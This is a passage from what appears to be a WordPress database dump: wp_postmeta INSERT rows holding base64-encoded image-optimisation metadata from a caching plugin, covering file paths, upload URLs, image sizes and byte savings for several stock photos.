wvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MjUsInRpbWUiOjE0ODM1ODMzNDYsImlkIjo3MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDk3LCJ0aW1lIjoxNDgzNTgzMzUwLCJpZCI6NzMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0NzIsInRpbWUiOjE0ODM1ODMzNTMsImlkIjo3MzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU2MiwidGltZSI6MTQ4MzU4MzM1NiwiaWQiOjczMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODYwLCJ0aW1lIjoxNDgzNTgzMzYwLCJpZCI6NzMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo5MDMsInRpbWUiOjE0ODM1ODMzNjQsImlkIjo3MzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzI2NzgyMjg5LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyNjc4MjI4OS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjY3ODIyODktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEyOTIsInRpbWUiOjE0ODM1ODMzNjcsImlkIjo3MzB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30047, 729, 'wpfc_optimisation_reduction', '12983'); 
INSERT INTO `wp_postmeta` VALUES (30048, 729, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMuanBnIiwid2lkdGgiOjQxNDAsImhlaWdodCI6MjYxMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MzM3MiwiaWQiOiI3MjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6Njg0LCJ0aW1lIjoxNDgzNTgzMzc2LCJpZCI6NzI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtODAweDUwNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUwNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTgwMHg1MDQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy04MDB4NTA0LmpwZyIsInJlZHVjdGlvbiI6MTAxMCwidGltZSI6MTQ4MzU4MzM4MCwiaWQiOjcyOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTc2OHg0ODQuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy03Njh4NDg0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtNzY4eDQ4NC5qcGciLCJyZWR1Y3Rpb24iOjEwMTksInRpbWUiOjE0ODM1ODMzODQsImlkIjo3Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0xNjAweDEwMDkuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTAwOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTE2MDB4MTAwOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTE2MDB4MTAwOS5qcGciLCJyZWR1Y3Rpb24iOjM3MDYsInRpbWUiOjE0ODM1ODMzODksImlkIjo3Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2MTksInRpbWUiOjE0ODM1ODMzOTIsImlkIjo3Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MjAsInRpbWUiOjE0ODM1ODMzOTUsImlkIjo3Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzksInRpbWUiOjE0ODM1ODMzOTksImlkIjo3Mjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5MjYsInRpbWUiOjE0ODM1ODM0MDMsImlkIjo3Mjl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjUyOCwidGltZSI6MTQ4MzU4MzQwNiwiaWQiOjcyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NjU3LCJ0aW1lIjoxNDgzNTgzNDA5LCJpZCI6NzI5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo4MTksInRpbWUiOjE0ODM1ODM0MTMsImlkIjo3Mjl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg3MiwidGltZSI6MTQ4MzU4MzQxNywiaWQiOjcyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDIwNTYyMzMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTAyMDU2MjMzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwMjA1NjIzMy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTA4NCwidGltZSI6MTQ4MzU4MzQyMCwiaWQiOjcyOX1d'); 
INSERT INTO `wp_postmeta` VALUES (30049, 728, 'wpfc_optimisation_reduction', '12951'); 
INSERT INTO `wp_postmeta` VALUES (30050, 728, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LmpwZyIsIndpZHRoIjo0MjAwLCJoZWlnaHQiOjI2MTAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODM0MjUsImlkIjoiNzI4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU5OCwidGltZSI6MTQ4MzU4MzQyOSwiaWQiOjcyOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktODAweDQ5Ny5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ5NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktODAweDQ5Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfOTgwMzg4MjktODAweDQ5Ny5qcGciLCJyZWR1Y3Rpb24iOjExMzAsInRpbWUiOjE0ODM1ODM0MzMsImlkIjo3Mjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTc2OHg0NzcuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0NzcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTc2OHg0NzcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTc2OHg0NzcuanBnIiwicmVkdWN0aW9uIjoxMDU0LCJ0aW1lIjoxNDgzNTgzNDM2LCJpZCI6NzI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS0xNjAweDk5NC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0Ijo5OTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTE2MDB4OTk0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja185ODAzODgyOS0xNjAweDk5NC5qcGciLCJyZWR1Y3Rpb24iOjQ3NDAsInRpbWUiOjE0ODM1ODM0NDEsImlkIjo3Mjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzk4MDM4ODI5LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGR